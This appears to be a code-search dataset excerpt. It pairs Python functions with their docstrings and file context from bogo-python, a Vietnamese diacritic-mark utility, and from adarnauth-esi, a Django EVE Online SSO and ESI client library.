def is_valid_mark(comps, mark_trans):
"""
Check whether the mark given by mark_trans is valid to add to the components
"""
if mark_trans == "*_":
return True
components = list(comps)
if mark_trans[0] == 'd' and components[0] \
and components[0][-1].lower() in ("d", "đ"):
return True
elif components[1] != "" and \
strip(components[1]).lower().find(mark_trans[0]) != -1:
return True
else:
return False
def remove_mark_char(char):
"""Remove mark from a single character, if any."""
return add_mark_char(char, Mark.NONE)
def remove_mark_string(string):
return utils.join([remove_mark_char(c) for c in string])
def strip(string):
"""
Strip a string of all marks and accents.
"""
return remove_mark_string(accent.remove_accent_string(string))
|
BoGoEngine/bogo-python | bogo/mark.py | add_mark_at | python | def add_mark_at(string, index, mark):
if index == -1:
return string
# Python can handle the case which index is out of range of given string
return string[:index] + add_mark_char(string[index], mark) + string[index+1:] | Add mark to the index-th character of the given string. Return the new string after applying change.
Notice: index > 0 | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/mark.py#L100-L108 | [
"def add_mark_char(char, mark):\n \"\"\"\n Add mark to a single char.\n \"\"\"\n if char == \"\":\n return \"\"\n case = char.isupper()\n ac = accent.get_accent_char(char)\n char = accent.add_accent_char(char.lower(), Accent.NONE)\n new_char = char\n if mark == Mark.HAT:\n i... | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Utility functions to deal with marks, which are diacritical markings
to change the base sound of a character but not its tonal quality.
E.g. the hat mark in â.
"""
from __future__ import unicode_literals
from bogo import accent, utils
Accent = accent.Accent
class Mark:
HAT = 4
HORN = 3
BREVE = 2
BAR = 1
NONE = 0
FAMILY_A = "aăâ"
FAMILY_E = "eê"
FAMILY_O = "oơô"
FAMILY_U = "uư"
FAMILY_D = "dđ"
def get_mark_char(char):
"""
Get the mark of a single char, if any.
"""
char = accent.remove_accent_char(char.lower())
if char == "":
return Mark.NONE
if char == "đ":
return Mark.BAR
if char in "ă":
return Mark.BREVE
if char in "ơư":
return Mark.HORN
if char in "âêô":
return Mark.HAT
return Mark.NONE
# TODO: Monstrous code. Needs refactoring.
def add_mark(components, mark):
comp = list(components)
if mark == Mark.BAR and comp[0] and comp[0][-1].lower() in FAMILY_D:
comp[0] = add_mark_at(comp[0], len(comp[0])-1, Mark.BAR)
else:
#remove all marks and accents in vowel part
raw_vowel = accent.add_accent(comp, Accent.NONE)[1].lower()
raw_vowel = utils.join([add_mark_char(c, Mark.NONE) for c in raw_vowel])
if mark == Mark.HAT:
pos = max(raw_vowel.find("a"), raw_vowel.find("o"),
raw_vowel.find("e"))
comp[1] = add_mark_at(comp[1], pos, Mark.HAT)
elif mark == Mark.BREVE:
if raw_vowel != "ua":
comp[1] = add_mark_at(comp[1], raw_vowel.find("a"), Mark.BREVE)
elif mark == Mark.HORN:
if raw_vowel in ("uo", "uoi", "uou"):
comp[1] = utils.join([add_mark_char(c, Mark.HORN) for c in comp[1][:2]]) + comp[1][2:]
elif raw_vowel == "oa":
comp[1] = add_mark_at(comp[1], 1, Mark.HORN)
else:
pos = max(raw_vowel.find(""), raw_vowel.find("o"))
comp[1] = add_mark_at(comp[1], pos, Mark.HORN)
if mark == Mark.NONE:
if not raw_vowel == comp[1].lower():
comp[1] = raw_vowel
elif comp[0] and comp[0][-1] == "đ":
comp[0] = comp[0][:-1] + "d"
return comp
def add_mark_char(char, mark):
"""
Add mark to a single char.
"""
if char == "":
return ""
case = char.isupper()
ac = accent.get_accent_char(char)
char = accent.add_accent_char(char.lower(), Accent.NONE)
new_char = char
if mark == Mark.HAT:
if char in FAMILY_A:
new_char = "â"
elif char in FAMILY_O:
new_char = "ô"
elif char in FAMILY_E:
new_char = "ê"
elif mark == Mark.HORN:
if char in FAMILY_O:
new_char = "ơ"
elif char in FAMILY_U:
new_char = "ư"
elif mark == Mark.BREVE:
if char in FAMILY_A:
new_char = "ă"
elif mark == Mark.BAR:
if char in FAMILY_D:
new_char = "đ"
elif mark == Mark.NONE:
if char in FAMILY_A:
new_char = "a"
elif char in FAMILY_E:
new_char = "e"
elif char in FAMILY_O:
new_char = "o"
elif char in FAMILY_U:
new_char = "u"
elif char in FAMILY_D:
new_char = "d"
new_char = accent.add_accent_char(new_char, ac)
return utils.change_case(new_char, case)
def is_valid_mark(comps, mark_trans):
"""
Check whether the mark given by mark_trans is valid to add to the components
"""
if mark_trans == "*_":
return True
components = list(comps)
if mark_trans[0] == 'd' and components[0] \
and components[0][-1].lower() in ("d", "đ"):
return True
elif components[1] != "" and \
strip(components[1]).lower().find(mark_trans[0]) != -1:
return True
else:
return False
def remove_mark_char(char):
"""Remove mark from a single character, if any."""
return add_mark_char(char, Mark.NONE)
def remove_mark_string(string):
return utils.join([remove_mark_char(c) for c in string])
def strip(string):
"""
Strip a string of all marks and accents.
"""
return remove_mark_string(accent.remove_accent_string(string))
|
BoGoEngine/bogo-python | bogo/mark.py | add_mark_char | python | def add_mark_char(char, mark):
if char == "":
return ""
case = char.isupper()
ac = accent.get_accent_char(char)
char = accent.add_accent_char(char.lower(), Accent.NONE)
new_char = char
if mark == Mark.HAT:
if char in FAMILY_A:
new_char = "â"
elif char in FAMILY_O:
new_char = "ô"
elif char in FAMILY_E:
new_char = "ê"
elif mark == Mark.HORN:
if char in FAMILY_O:
new_char = "ơ"
elif char in FAMILY_U:
new_char = "ư"
elif mark == Mark.BREVE:
if char in FAMILY_A:
new_char = "ă"
elif mark == Mark.BAR:
if char in FAMILY_D:
new_char = "đ"
elif mark == Mark.NONE:
if char in FAMILY_A:
new_char = "a"
elif char in FAMILY_E:
new_char = "e"
elif char in FAMILY_O:
new_char = "o"
elif char in FAMILY_U:
new_char = "u"
elif char in FAMILY_D:
new_char = "d"
new_char = accent.add_accent_char(new_char, ac)
return utils.change_case(new_char, case) | Add mark to a single char. | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/mark.py#L111-L152 | [
"def get_accent_char(char):\n \"\"\"\n Get the accent of an single char, if any.\n \"\"\"\n index = utils.VOWELS.find(char.lower())\n if (index != -1):\n return 5 - index % 6\n else:\n return Accent.NONE\n",
"def add_accent_char(char, accent):\n \"\"\"\n Add accent to a singl... | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Utility functions to deal with marks, which are diacritical markings
to change the base sound of a character but not its tonal quality.
E.g. the hat mark in â.
"""
from __future__ import unicode_literals
from bogo import accent, utils
Accent = accent.Accent
class Mark:
HAT = 4
HORN = 3
BREVE = 2
BAR = 1
NONE = 0
FAMILY_A = "aăâ"
FAMILY_E = "eê"
FAMILY_O = "oơô"
FAMILY_U = "uư"
FAMILY_D = "dđ"
def get_mark_char(char):
"""
Get the mark of a single char, if any.
"""
char = accent.remove_accent_char(char.lower())
if char == "":
return Mark.NONE
if char == "đ":
return Mark.BAR
if char in "ă":
return Mark.BREVE
if char in "ơư":
return Mark.HORN
if char in "âêô":
return Mark.HAT
return Mark.NONE
# TODO: Monstrous code. Needs refactoring.
def add_mark(components, mark):
comp = list(components)
if mark == Mark.BAR and comp[0] and comp[0][-1].lower() in FAMILY_D:
comp[0] = add_mark_at(comp[0], len(comp[0])-1, Mark.BAR)
else:
#remove all marks and accents in vowel part
raw_vowel = accent.add_accent(comp, Accent.NONE)[1].lower()
raw_vowel = utils.join([add_mark_char(c, Mark.NONE) for c in raw_vowel])
if mark == Mark.HAT:
pos = max(raw_vowel.find("a"), raw_vowel.find("o"),
raw_vowel.find("e"))
comp[1] = add_mark_at(comp[1], pos, Mark.HAT)
elif mark == Mark.BREVE:
if raw_vowel != "ua":
comp[1] = add_mark_at(comp[1], raw_vowel.find("a"), Mark.BREVE)
elif mark == Mark.HORN:
if raw_vowel in ("uo", "uoi", "uou"):
comp[1] = utils.join([add_mark_char(c, Mark.HORN) for c in comp[1][:2]]) + comp[1][2:]
elif raw_vowel == "oa":
comp[1] = add_mark_at(comp[1], 1, Mark.HORN)
else:
pos = max(raw_vowel.find(""), raw_vowel.find("o"))
comp[1] = add_mark_at(comp[1], pos, Mark.HORN)
if mark == Mark.NONE:
if not raw_vowel == comp[1].lower():
comp[1] = raw_vowel
elif comp[0] and comp[0][-1] == "đ":
comp[0] = comp[0][:-1] + "d"
return comp
def add_mark_at(string, index, mark):
"""
Add mark to the index-th character of the given string. Return the new string after applying change.
Notice: index > 0
"""
if index == -1:
return string
# Python can handle the case which index is out of range of given string
return string[:index] + add_mark_char(string[index], mark) + string[index+1:]
def is_valid_mark(comps, mark_trans):
"""
Check whether the mark given by mark_trans is valid to add to the components
"""
if mark_trans == "*_":
return True
components = list(comps)
if mark_trans[0] == 'd' and components[0] \
and components[0][-1].lower() in ("d", "đ"):
return True
elif components[1] != "" and \
strip(components[1]).lower().find(mark_trans[0]) != -1:
return True
else:
return False
def remove_mark_char(char):
"""Remove mark from a single character, if any."""
return add_mark_char(char, Mark.NONE)
def remove_mark_string(string):
return utils.join([remove_mark_char(c) for c in string])
def strip(string):
"""
Strip a string of all marks and accents.
"""
return remove_mark_string(accent.remove_accent_string(string))
|
BoGoEngine/bogo-python | bogo/mark.py | is_valid_mark | python | def is_valid_mark(comps, mark_trans):
if mark_trans == "*_":
return True
components = list(comps)
if mark_trans[0] == 'd' and components[0] \
and components[0][-1].lower() in ("d", "đ"):
return True
elif components[1] != "" and \
strip(components[1]).lower().find(mark_trans[0]) != -1:
return True
else:
return False | Check whether the mark given by mark_trans is valid to add to the components | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/mark.py#L155-L170 | [
"def strip(string):\n \"\"\"\n Strip a string of all marks and accents.\n \"\"\"\n return remove_mark_string(accent.remove_accent_string(string))\n"
] | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Utility functions to deal with marks, which are diacritical markings
to change the base sound of a character but not its tonal quality.
E.g. the hat mark in â.
"""
from __future__ import unicode_literals
from bogo import accent, utils
Accent = accent.Accent
class Mark:
HAT = 4
HORN = 3
BREVE = 2
BAR = 1
NONE = 0
FAMILY_A = "aăâ"
FAMILY_E = "eê"
FAMILY_O = "oơô"
FAMILY_U = "uư"
FAMILY_D = "dđ"
def get_mark_char(char):
"""
Get the mark of a single char, if any.
"""
char = accent.remove_accent_char(char.lower())
if char == "":
return Mark.NONE
if char == "đ":
return Mark.BAR
if char in "ă":
return Mark.BREVE
if char in "ơư":
return Mark.HORN
if char in "âêô":
return Mark.HAT
return Mark.NONE
# TODO: Monstrous code. Needs refactoring.
def add_mark(components, mark):
comp = list(components)
if mark == Mark.BAR and comp[0] and comp[0][-1].lower() in FAMILY_D:
comp[0] = add_mark_at(comp[0], len(comp[0])-1, Mark.BAR)
else:
#remove all marks and accents in vowel part
raw_vowel = accent.add_accent(comp, Accent.NONE)[1].lower()
raw_vowel = utils.join([add_mark_char(c, Mark.NONE) for c in raw_vowel])
if mark == Mark.HAT:
pos = max(raw_vowel.find("a"), raw_vowel.find("o"),
raw_vowel.find("e"))
comp[1] = add_mark_at(comp[1], pos, Mark.HAT)
elif mark == Mark.BREVE:
if raw_vowel != "ua":
comp[1] = add_mark_at(comp[1], raw_vowel.find("a"), Mark.BREVE)
elif mark == Mark.HORN:
if raw_vowel in ("uo", "uoi", "uou"):
comp[1] = utils.join([add_mark_char(c, Mark.HORN) for c in comp[1][:2]]) + comp[1][2:]
elif raw_vowel == "oa":
comp[1] = add_mark_at(comp[1], 1, Mark.HORN)
else:
pos = max(raw_vowel.find(""), raw_vowel.find("o"))
comp[1] = add_mark_at(comp[1], pos, Mark.HORN)
if mark == Mark.NONE:
if not raw_vowel == comp[1].lower():
comp[1] = raw_vowel
elif comp[0] and comp[0][-1] == "đ":
comp[0] = comp[0][:-1] + "d"
return comp
def add_mark_at(string, index, mark):
"""
Add mark to the index-th character of the given string. Return the new string after applying change.
Notice: index > 0
"""
if index == -1:
return string
# Python can handle the case which index is out of range of given string
return string[:index] + add_mark_char(string[index], mark) + string[index+1:]
def add_mark_char(char, mark):
"""
Add mark to a single char.
"""
if char == "":
return ""
case = char.isupper()
ac = accent.get_accent_char(char)
char = accent.add_accent_char(char.lower(), Accent.NONE)
new_char = char
if mark == Mark.HAT:
if char in FAMILY_A:
new_char = "â"
elif char in FAMILY_O:
new_char = "ô"
elif char in FAMILY_E:
new_char = "ê"
elif mark == Mark.HORN:
if char in FAMILY_O:
new_char = "ơ"
elif char in FAMILY_U:
new_char = "ư"
elif mark == Mark.BREVE:
if char in FAMILY_A:
new_char = "ă"
elif mark == Mark.BAR:
if char in FAMILY_D:
new_char = "đ"
elif mark == Mark.NONE:
if char in FAMILY_A:
new_char = "a"
elif char in FAMILY_E:
new_char = "e"
elif char in FAMILY_O:
new_char = "o"
elif char in FAMILY_U:
new_char = "u"
elif char in FAMILY_D:
new_char = "d"
new_char = accent.add_accent_char(new_char, ac)
return utils.change_case(new_char, case)
def remove_mark_char(char):
"""Remove mark from a single character, if any."""
return add_mark_char(char, Mark.NONE)
def remove_mark_string(string):
return utils.join([remove_mark_char(c) for c in string])
def strip(string):
"""
Strip a string of all marks and accents.
"""
return remove_mark_string(accent.remove_accent_string(string))
|
Adarnof/adarnauth-esi | esi/views.py | sso_redirect | python | def sso_redirect(request, scopes=list([]), return_to=None):
logger.debug("Initiating redirect of {0} session {1}".format(request.user, request.session.session_key[:5]))
if isinstance(scopes, string_types):
scopes = list([scopes])
# ensure only one callback redirect model per session
CallbackRedirect.objects.filter(session_key=request.session.session_key).delete()
# ensure session installed in database
if not request.session.exists(request.session.session_key):
logger.debug("Creating new session before redirect.")
request.session.create()
if return_to:
url = reverse(return_to)
else:
url = request.get_full_path()
oauth = OAuth2Session(app_settings.ESI_SSO_CLIENT_ID, redirect_uri=app_settings.ESI_SSO_CALLBACK_URL, scope=scopes)
redirect_url, state = oauth.authorization_url(app_settings.ESI_OAUTH_LOGIN_URL)
CallbackRedirect.objects.create(session_key=request.session.session_key, state=state, url=url)
logger.debug("Redirecting {0} session {1} to SSO. Callback will be redirected to {2}".format(request.user, request.session.session_key[:5], url))
return redirect(redirect_url) | Generates a :model:`esi.CallbackRedirect` for the specified request.
Redirects to EVE for login.
Accepts a view or URL name as a redirect after SSO. | train | https://github.com/Adarnof/adarnauth-esi/blob/f6618a31efbfeedeb96316ab9b82ecadda776ac1/esi/views.py#L16-L44 | null | from __future__ import unicode_literals
from django.shortcuts import redirect, get_object_or_404, render
from django.utils.six import string_types
from django.urls import reverse
from esi.models import CallbackRedirect, Token
from esi import app_settings
from esi.decorators import tokens_required
from django.http.response import HttpResponseBadRequest
from requests_oauthlib import OAuth2Session
import logging
logger = logging.getLogger(__name__)
def receive_callback(request):
"""
Parses SSO callback, validates, retrieves :model:`esi.Token`, and internally redirects to the target url.
"""
logger.debug("Received callback for {0} session {1}".format(request.user, request.session.session_key[:5]))
# make sure request has required parameters
code = request.GET.get('code', None)
state = request.GET.get('state', None)
try:
assert code
assert state
except AssertionError:
logger.debug("Missing parameters for code exchange.")
return HttpResponseBadRequest()
callback = get_object_or_404(CallbackRedirect, state=state, session_key=request.session.session_key)
token = Token.objects.create_from_request(request)
callback.token = token
callback.save()
logger.debug(
"Processed callback for {0} session {1}. Redirecting to {2}".format(request.user, request.session.session_key[:5], callback.url))
return redirect(callback.url)
def select_token(request, scopes='', new=False):
"""
Presents the user with a selection of applicable tokens for the requested view.
"""
@tokens_required(scopes=scopes, new=new)
def _token_list(r, tokens):
context = {
'tokens': tokens,
'base_template': app_settings.ESI_BASE_TEMPLATE,
}
return render(r, 'esi/select_token.html', context=context)
return _token_list(request)
|
Adarnof/adarnauth-esi | esi/views.py | receive_callback | python | def receive_callback(request):
logger.debug("Received callback for {0} session {1}".format(request.user, request.session.session_key[:5]))
# make sure request has required parameters
code = request.GET.get('code', None)
state = request.GET.get('state', None)
try:
assert code
assert state
except AssertionError:
logger.debug("Missing parameters for code exchange.")
return HttpResponseBadRequest()
callback = get_object_or_404(CallbackRedirect, state=state, session_key=request.session.session_key)
token = Token.objects.create_from_request(request)
callback.token = token
callback.save()
logger.debug(
"Processed callback for {0} session {1}. Redirecting to {2}".format(request.user, request.session.session_key[:5], callback.url))
return redirect(callback.url) | Parses SSO callback, validates, retrieves :model:`esi.Token`, and internally redirects to the target url. | train | https://github.com/Adarnof/adarnauth-esi/blob/f6618a31efbfeedeb96316ab9b82ecadda776ac1/esi/views.py#L47-L68 | null | from __future__ import unicode_literals
from django.shortcuts import redirect, get_object_or_404, render
from django.utils.six import string_types
from django.urls import reverse
from esi.models import CallbackRedirect, Token
from esi import app_settings
from esi.decorators import tokens_required
from django.http.response import HttpResponseBadRequest
from requests_oauthlib import OAuth2Session
import logging
logger = logging.getLogger(__name__)
def sso_redirect(request, scopes=list([]), return_to=None):
"""
Generates a :model:`esi.CallbackRedirect` for the specified request.
Redirects to EVE for login.
Accepts a view or URL name as a redirect after SSO.
"""
logger.debug("Initiating redirect of {0} session {1}".format(request.user, request.session.session_key[:5]))
if isinstance(scopes, string_types):
scopes = list([scopes])
# ensure only one callback redirect model per session
CallbackRedirect.objects.filter(session_key=request.session.session_key).delete()
# ensure session installed in database
if not request.session.exists(request.session.session_key):
logger.debug("Creating new session before redirect.")
request.session.create()
if return_to:
url = reverse(return_to)
else:
url = request.get_full_path()
oauth = OAuth2Session(app_settings.ESI_SSO_CLIENT_ID, redirect_uri=app_settings.ESI_SSO_CALLBACK_URL, scope=scopes)
redirect_url, state = oauth.authorization_url(app_settings.ESI_OAUTH_LOGIN_URL)
CallbackRedirect.objects.create(session_key=request.session.session_key, state=state, url=url)
logger.debug("Redirecting {0} session {1} to SSO. Callback will be redirected to {2}".format(request.user, request.session.session_key[:5], url))
return redirect(redirect_url)
def select_token(request, scopes='', new=False):
"""
Presents the user with a selection of applicable tokens for the requested view.
"""
@tokens_required(scopes=scopes, new=new)
def _token_list(r, tokens):
context = {
'tokens': tokens,
'base_template': app_settings.ESI_BASE_TEMPLATE,
}
return render(r, 'esi/select_token.html', context=context)
return _token_list(request)
|
Adarnof/adarnauth-esi | esi/views.py | select_token | python | def select_token(request, scopes='', new=False):
@tokens_required(scopes=scopes, new=new)
def _token_list(r, tokens):
context = {
'tokens': tokens,
'base_template': app_settings.ESI_BASE_TEMPLATE,
}
return render(r, 'esi/select_token.html', context=context)
return _token_list(request) | Presents the user with a selection of applicable tokens for the requested view. | train | https://github.com/Adarnof/adarnauth-esi/blob/f6618a31efbfeedeb96316ab9b82ecadda776ac1/esi/views.py#L71-L84 | [
"def tokens_required(scopes='', new=False):\n \"\"\"\n Decorator for views to request an ESI Token.\n Accepts required scopes as a space-delimited string\n or list of strings of scope names.\n Can require a new token to be retrieved by SSO.\n Returns a QueryDict of Tokens.\n \"\"\"\n\n def d... | from __future__ import unicode_literals
from django.shortcuts import redirect, get_object_or_404, render
from django.utils.six import string_types
from django.urls import reverse
from esi.models import CallbackRedirect, Token
from esi import app_settings
from esi.decorators import tokens_required
from django.http.response import HttpResponseBadRequest
from requests_oauthlib import OAuth2Session
import logging
logger = logging.getLogger(__name__)
def sso_redirect(request, scopes=list([]), return_to=None):
"""
Generates a :model:`esi.CallbackRedirect` for the specified request.
Redirects to EVE for login.
Accepts a view or URL name as a redirect after SSO.
"""
logger.debug("Initiating redirect of {0} session {1}".format(request.user, request.session.session_key[:5]))
if isinstance(scopes, string_types):
scopes = list([scopes])
# ensure only one callback redirect model per session
CallbackRedirect.objects.filter(session_key=request.session.session_key).delete()
# ensure session installed in database
if not request.session.exists(request.session.session_key):
logger.debug("Creating new session before redirect.")
request.session.create()
if return_to:
url = reverse(return_to)
else:
url = request.get_full_path()
oauth = OAuth2Session(app_settings.ESI_SSO_CLIENT_ID, redirect_uri=app_settings.ESI_SSO_CALLBACK_URL, scope=scopes)
redirect_url, state = oauth.authorization_url(app_settings.ESI_OAUTH_LOGIN_URL)
CallbackRedirect.objects.create(session_key=request.session.session_key, state=state, url=url)
logger.debug("Redirecting {0} session {1} to SSO. Callback will be redirected to {2}".format(request.user, request.session.session_key[:5], url))
return redirect(redirect_url)
def receive_callback(request):
"""
Parses SSO callback, validates, retrieves :model:`esi.Token`, and internally redirects to the target url.
"""
logger.debug("Received callback for {0} session {1}".format(request.user, request.session.session_key[:5]))
# make sure request has required parameters
code = request.GET.get('code', None)
state = request.GET.get('state', None)
try:
assert code
assert state
except AssertionError:
logger.debug("Missing parameters for code exchange.")
return HttpResponseBadRequest()
callback = get_object_or_404(CallbackRedirect, state=state, session_key=request.session.session_key)
token = Token.objects.create_from_request(request)
callback.token = token
callback.save()
logger.debug(
"Processed callback for {0} session {1}. Redirecting to {2}".format(request.user, request.session.session_key[:5], callback.url))
return redirect(callback.url)
|
Adarnof/adarnauth-esi | esi/tasks.py | cleanup_callbackredirect | python | def cleanup_callbackredirect(max_age=300):
max_age = timezone.now() - timedelta(seconds=max_age)
logger.debug("Deleting all callback redirects created before {0}".format(max_age.strftime("%b %d %Y %H:%M:%S")))
CallbackRedirect.objects.filter(created__lte=max_age).delete() | Delete old :model:`esi.CallbackRedirect` models.
Accepts a max_age parameter, in seconds (default 300). | train | https://github.com/Adarnof/adarnauth-esi/blob/f6618a31efbfeedeb96316ab9b82ecadda776ac1/esi/tasks.py#L13-L20 | null | from __future__ import unicode_literals
from django.utils import timezone
from datetime import timedelta
from esi.models import CallbackRedirect, Token
from celery import shared_task
import logging
logger = logging.getLogger(__name__)
@shared_task
@shared_task
def cleanup_token():
"""
Delete expired :model:`esi.Token` models.
"""
logger.debug("Triggering bulk refresh of all expired tokens.")
Token.objects.all().get_expired().bulk_refresh()
|
Adarnof/adarnauth-esi | esi/clients.py | cache_spec | python | def cache_spec(name, spec):
return cache.set(build_cache_name(name), spec, app_settings.ESI_SPEC_CACHE_DURATION) | Cache the spec dict
:param name: Version name
:param spec: Spec dict
:return: True if cached | train | https://github.com/Adarnof/adarnauth-esi/blob/f6618a31efbfeedeb96316ab9b82ecadda776ac1/esi/clients.py#L123-L130 | [
"def build_cache_name(name):\n \"\"\"\n Cache key name formatter\n :param name: Name of the spec dict to cache, usually version\n :return: String name for cache key\n :rtype: str\n \"\"\"\n return 'esi_swaggerspec_%s' % name\n"
] | from __future__ import unicode_literals
from bravado.client import SwaggerClient, CONFIG_DEFAULTS
from bravado import requests_client
from bravado.swagger_model import Loader
from bravado.http_future import HttpFuture
from bravado_core.spec import Spec
from esi.errors import TokenExpiredError
from esi import app_settings
from django.core.cache import cache
from datetime import datetime
from hashlib import md5
import json
try:
import urlparse
except ImportError: # py3
from urllib import parse as urlparse
SPEC_CONFIG = {'use_models': False}
class CachingHttpFuture(HttpFuture):
"""
Used to add caching to certain HTTP requests according to "Expires" header
"""
def __init__(self, *args, **kwargs):
super(CachingHttpFuture, self).__init__(*args, **kwargs)
self.cache_key = self._build_cache_key(self.future.request)
@staticmethod
def _build_cache_key(request):
"""
Generated the key name used to cache responses
:param request: request used to retrieve API response
:return: formatted cache name
"""
str_hash = md5(
(request.method + request.url + str(request.params) + str(request.data) + str(request.json)).encode(
'utf-8')).hexdigest()
return 'esi_%s' % str_hash
@staticmethod
def _time_to_expiry(expires):
"""
Determines the seconds until a HTTP header "Expires" timestamp
:param expires: HTTP response "Expires" header
:return: seconds until "Expires" time
"""
try:
expires_dt = datetime.strptime(str(expires), '%a, %d %b %Y %H:%M:%S %Z')
delta = expires_dt - datetime.utcnow()
return delta.seconds
except ValueError:
return 0
def result(self, **kwargs):
if app_settings.ESI_CACHE_RESPONSE and self.future.request.method == 'GET' and self.operation is not None:
"""
Only cache if all are true:
- settings dictate caching
- it's a http get request
- it's to a swagger api endpoint
"""
cached = cache.get(self.cache_key)
if cached:
result, response = cached
else:
_also_return_response = self.also_return_response # preserve original value
self.also_return_response = True # override to always get the raw response for expiry header
result, response = super(CachingHttpFuture, self).result(**kwargs)
self.also_return_response = _also_return_response # restore original value
if 'Expires' in response.headers:
expires = self._time_to_expiry(response.headers['Expires'])
if expires > 0:
cache.set(self.cache_key, (result, response), expires)
if self.also_return_response:
return result, response
else:
return result
else:
return super(CachingHttpFuture, self).result(**kwargs)
requests_client.HttpFuture = CachingHttpFuture
class TokenAuthenticator(requests_client.Authenticator):
"""
Adds the authorization header containing access token, if specified.
Sets ESI datasource to tranquility or singularity.
"""
def __init__(self, token=None, datasource=None):
host = urlparse.urlsplit(app_settings.ESI_API_URL).hostname
super(TokenAuthenticator, self).__init__(host)
self.token = token
self.datasource = datasource
def apply(self, request):
if self.token and self.token.expired:
if self.token.can_refresh:
self.token.refresh()
else:
raise TokenExpiredError()
request.headers['Authorization'] = 'Bearer ' + self.token.access_token if self.token else None
request.params['datasource'] = self.datasource or app_settings.ESI_API_DATASOURCE
return request
def build_cache_name(name):
"""
Cache key name formatter
:param name: Name of the spec dict to cache, usually version
:return: String name for cache key
:rtype: str
"""
return 'esi_swaggerspec_%s' % name
def build_spec_url(spec_version):
"""
Generates the URL to swagger.json for the ESI version
:param spec_version: Name of the swagger spec version, like latest or v4
:return: URL to swagger.json for the requested spec version
"""
return urlparse.urljoin(app_settings.ESI_API_URL, spec_version + '/swagger.json')
def get_spec(name, http_client=None, config=None):
"""
:param name: Name of the revision of spec, eg latest or v4
:param http_client: Requests client used for retrieving specs
:param config: Spec configuration - see Spec.CONFIG_DEFAULTS
:return: :class:`bravado_core.spec.Spec`
"""
http_client = http_client or requests_client.RequestsClient()
def load_spec():
loader = Loader(http_client)
return loader.load_spec(build_spec_url(name))
spec_dict = cache.get_or_set(build_cache_name(name), load_spec, app_settings.ESI_SPEC_CACHE_DURATION)
config = dict(CONFIG_DEFAULTS, **(config or {}))
return Spec.from_dict(spec_dict, build_spec_url(name), http_client, config)
def build_spec(base_version, http_client=None, **kwargs):
"""
Generates the Spec used to initialize a SwaggerClient, supporting mixed resource versions
:param http_client: :class:`bravado.requests_client.RequestsClient`
:param base_version: Version to base the spec on. Any resource without an explicit version will be this.
:param kwargs: Explicit resource versions, by name (eg Character='v4')
:return: :class:`bravado_core.spec.Spec`
"""
base_spec = get_spec(base_version, http_client=http_client, config=SPEC_CONFIG)
if kwargs:
for resource, resource_version in kwargs.items():
versioned_spec = get_spec(resource_version, http_client=http_client, config=SPEC_CONFIG)
try:
spec_resource = versioned_spec.resources[resource.capitalize()]
except KeyError:
raise AttributeError(
'Resource {0} not found on API revision {1}'.format(resource, resource_version))
base_spec.resources[resource.capitalize()] = spec_resource
return base_spec
def read_spec(path, http_client=None):
"""
Reads in a swagger spec file used to initialize a SwaggerClient
:param path: String path to local swagger spec file.
:param http_client: :class:`bravado.requests_client.RequestsClient`
:return: :class:`bravado_core.spec.Spec`
"""
with open(path, 'r') as f:
spec_dict = json.loads(f.read())
return SwaggerClient.from_spec(spec_dict, http_client=http_client, config=SPEC_CONFIG)
def esi_client_factory(token=None, datasource=None, spec_file=None, version=None, **kwargs):
"""
Generates an ESI client.
:param token: :class:`esi.Token` used to access authenticated endpoints.
:param datasource: Name of the ESI datasource to access.
:param spec_file: Absolute path to a swagger spec file to load.
:param version: Base ESI API version. Accepted values are 'legacy', 'latest', 'dev', or 'vX' where X is a number.
:param kwargs: Explicit resource versions to build, in the form Character='v4'. Same values accepted as version.
:return: :class:`bravado.client.SwaggerClient`
If a spec_file is specified, specific versioning is not available. Meaning the version and resource version kwargs
are ignored in favour of the versions available in the spec_file.
"""
client = requests_client.RequestsClient()
if token or datasource:
client.authenticator = TokenAuthenticator(token=token, datasource=datasource)
api_version = version or app_settings.ESI_API_VERSION
if spec_file:
return read_spec(spec_file, http_client=client)
else:
spec = build_spec(api_version, http_client=client, **kwargs)
return SwaggerClient(spec)
def minimize_spec(spec_dict, operations=None, resources=None):
"""
